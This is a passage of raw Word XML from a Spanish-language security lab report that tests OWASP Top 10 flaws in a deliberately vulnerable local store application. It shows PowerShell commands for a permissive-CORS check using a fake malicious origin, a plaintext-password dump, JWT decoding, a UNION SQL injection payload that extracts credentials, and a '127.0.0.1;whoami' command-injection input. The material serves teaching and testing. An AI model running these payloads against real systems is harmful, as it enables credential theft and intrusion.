                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/actuator/info" | ConvertTo-Json -Depth 4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>(Invoke-WebRequest "http://127.0.0.1:8080/api/productos" -Headers @{ Origin="http://sitio-malicioso.evil" }).Headers["Access-Control-Allow-Origin"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A457C9F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CAA72C" w14:textId="306FCCC9" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Actuator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> responde sin autenticación y CORS permite el origen enviado. Para evitar archivos muy grandes, la descarga de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>heapdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> debe ser opcional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1004AC" w14:textId="5A9E6023" w:rsidR="00A95B94" w:rsidRPr="00742FE9" w:rsidRDefault="00A95B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95B94">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08DAFDCD" wp14:editId="243D44A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>270510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6401435" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1435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BC19CE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Actuator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> expuesto y cabecera CORS permisiva.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Fuente: </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36B685" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.3 A03 - Software Supply Chain Failures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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="7EC9F27D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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4FF7A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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>cd backend</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>mvn org.owasp:dependency-check-maven:check</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Start-Process "target\dependency-check-report.html"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24689954" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCEDEFD" w14:textId="0A3626F8" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Resultado esperado: el reporte identifi</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ca log4j-core 2.14.1 y enumera vulnerabilidades conocidas. La práctica demuestra detección SCA; no es necesario explotar Log4Shell dentro de la tienda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81BBFA" w14:textId="77777777" w:rsidR="00FD0D38" w:rsidRPr="00742FE9" w:rsidRDefault="00FD0D38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C8068F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5. Reporte OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Dependency-Check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> con la dependencia </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB08E10" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.4 A04 - Cryptographic Failures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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="7A2E0EFE" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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6EE3A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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>$usuarios = Invoke-RestMethod "http://127.0.0.1:8080/api/admin/usuarios" -Headers @{ Authorization="Bearer $token" }</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$usuarios.data | S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>elect-Object username,password,role | Format-Table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$partes = $token.Split(".")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$payload = $partes[1].Replace("-","+").Replace("_","/")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$payload = $payload.PadRight(([math]::Ceiling($payload.Length/4))*4,"=")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>[Text.Encoding]::UTF8.GetString([Convert]::From</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Base64String($payload))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54022401" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712C0C68" w14:textId="29FC8BCF" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: las contraseñas aparecen en texto plano y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> JWT se puede leer porque un JWT firmado no cifra su contenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C574B" w14:textId="647E6EDA" w:rsidR="003C79AB" w:rsidRPr="00742FE9" w:rsidRDefault="003C79AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C79AB">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="616F9688" wp14:editId="23A36301">
            <wp:extent cx="6048375" cy="2914015"/>
            <wp:effectExtent l="0" t="0" r="9525" b="63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36B45" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figura 6. Contraseñas en texto plano y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> JWT legible.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fu</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D270E8E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.5 A05 - Injection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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="0562E001" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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64B49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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t># SQL Injection manual</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$payload = "x%') UNION SELECT id,username,password,0::numeric,0,NULL FROM usuarios -- "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">$encoded = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>[Uri]::EscapeDataString($payload)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/productos/buscar?q=$encoded" | ConvertTo-Json -Depth 4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t># Command Injection controlado</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$hostPayload = [Uri]::EscapeDataString("127.0.0.1;whoami")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>.0.1:8080/api/admin/reportes/ping?host=$hostPayload"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D38277B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4F7E77" w14:textId="27272B53" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: el UNION compatible con seis columnas devuelve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> como si fueran datos de productos; el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> de ping ejecuta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> con los permisos del contenedor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5E240" w14:textId="1B87E058" w:rsidR="00AE7CBA" w:rsidRPr="00742FE9" w:rsidRDefault="00AE7CBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7CBA">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B65A73" wp14:editId="49BE59F8">
            <wp:extent cx="6048375" cy="3320415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2EAD3" w14:textId="6FF795F5" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7. SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> manual extrayendo credenciales.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006615DB" w14:textId="77777777" w:rsidR="00AE7CBA" w:rsidRDefault="00AE7CBA" w:rsidP="00AE7CBA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0840CC26" w14:textId="212AA962" w:rsidR="00AE7CBA" w:rsidRPr="00742FE9" w:rsidRDefault="00AE7CBA" w:rsidP="00AE7CBA">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7CBA">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB0D4D0" wp14:editId="45744DB1">
            <wp:extent cx="6048375" cy="3477895"/>
            <wp:effectExtent l="0" t="0" r="9525" b="825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5C6E2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ejecutando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
